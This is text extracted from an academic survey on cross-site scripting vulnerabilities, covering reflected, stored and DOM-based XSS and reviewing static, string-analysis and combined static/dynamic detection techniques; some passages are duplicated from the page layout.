Injection methods Depending on the ways HTML pages reference user inputs, XSS exploits can be broadly classified as reflected, stored, or DOM-based. Reflected or nonpersistent XSS holes are present in a Web application server program where it references accessed user input in the outgoing web-page. This type of XSS exploit is common in error messages and search results. The XSS ed project (http://xssed.com) recently reported multiple reflected XSS holes in McAfee that attackers could exploit to trick users into downloading viruses. Stored or persistent XSS holes exist when a server program stores user input containing injected code in a persistent data store such as a database and then references it in a webpage. Attacks against social networking sites commonly exploit this type of XXS flaw. An example is the Samy worm (www.securityfocus.com/brief/18), which, with-in less than 24 hours after its release on 4 October 2005, caused an exponential growth of friend lists for 1 million Myspace users, effectively creating a DoS attack. Both reflected and stored XSS holes result from improper handling of user inputs in server-side scripts. In contrast, DOM-based XSS holes appear in the Web application when client-side scripts reference user inputs, dynamically obtained from the Document Object Model structure, without proper validation. Bugzilla’s bug 272620 (https://bugzilla.mozilla.org/show_bug.cgi?id=272620) is an example of a DOM-based XSS exploit.
Other XSS defenses focus on identifying vulnerabilities in server-side scripts. Static-analysis-based approaches can prove the absence of vulnerabilities, but they tend to generate many false positives. Recent approaches com-bine static analysis with dynamic analysis techniques to improve accuracy. Static analysis. These techniques identify tainted inputs accessed from external data sources, track the flow of tainted data, and check if any reached sinks such as SQL statements and HTML output statements. Benjamin Liv-shits and Monica Lam used binary decision diagrams to apply points-to analysis to server-side scripts; their approach requires users to specify vulnerability patterns in Program Query Language.5 Yichen Xie and Alex Aiken proposed a static analysis technique that obtains block and function summary information from symbolic execution. Static-analysis-based techniques quickly detect potential XSS vulnerabilities in source code and are relatively easy for security personnel to implement and adopt. However, they cannot check the correctness of input sanitization functions and, instead, generally assume that unhandled or unknown functions return unsafe data. These approaches also miss DOM-based XSS vulnerabilities as they do not target client-side scripts. Static string analysis. Gary Wassermann and Zhen-dong Su enhanced the original taint-based approaches with string analysis.8 Their technique uses context-free grammars (CFGs) to represent the values a string variable can hold at a certain program point, which facilitates the checking of blacklisted string values in sensitive program statements. The enhancement provides more accuracy as it can analyze string operations’ effects on inputs. However, when conducting static string analysis, it is difficult to model complex operations such as string-numeric interaction; thus, this approach can result in false positives if analysts make conservative approximations when handling such operations. Static string analysis also suffers from the limitations of blacklist comparisons.
Combined static and dynamic analysis. Motivated by static-analysis-based approaches’ inability to identify faulty sanitization functions, Davide Balzarotti and colleagues developed the Saner tool, which checks the adequacy of sanitization functions for defending against XSS attacks.7 This successor to Pixy uses a static string analysis method similar to that proposed by Wassermann and Su to first identify the potentially faulty sanitization methods, then simulates the identified methods with a set of test inputs that contain attack strings and checks if any attack could still reach the sinks.
59MARCH 2012Note that the program’s control flow structure (line 9) dictates that the variable new tip must contain at least 100 characters, but the CFG for new tip results in the expression .* because Wassermann and Su’s approach cannot handle string-numeric interactions. Combined static and dynamic analysis. Motivated by static-analysis-based approaches’ inability to identify faulty sanitization functions, Davide Balzarotti and colleagues developed the Saner tool, which checks the adequacy of sanitization functions for defending against XSS attacks.7 This successor to Pixy uses a static string analysis method similar to that proposed by Wassermann and Su to first identify the potentially faulty sanitization methods, then simulates the identified methods with a set of test inputs that contain attack strings and checks if any attack could still reach the sinks. Lam and colleagues carried out points-to analysis to track the flow of tainted data in a program and then used this information to instrument the program for model-checking purposes.5 Applying the QED model checker based on Java Pathfinder (http://babelfish.arc.nasa.gov/trac/jpf), they simulated the instrumented program with inputs likely to lead to a match with user-specified vulnerability patterns. This approach’s effectiveness depends on the completeness of the vulnerability specifications and QED’s ability to explore as many different paths as possible. Building on the work by Wassermann and col-leagues, a team led by Adam Kiezun used concolic(concrete + symbolic) execution to capture program path constraints and a constraint solver to generate test inputs that explored various program paths.9 Upon reaching the sinks, they exercised two sets of inputs—one of ordinary valid strings and the other of attack strings from a library (http;//ha.ckers.org/xss.html)—and checked the differences between the resulting program behaviours.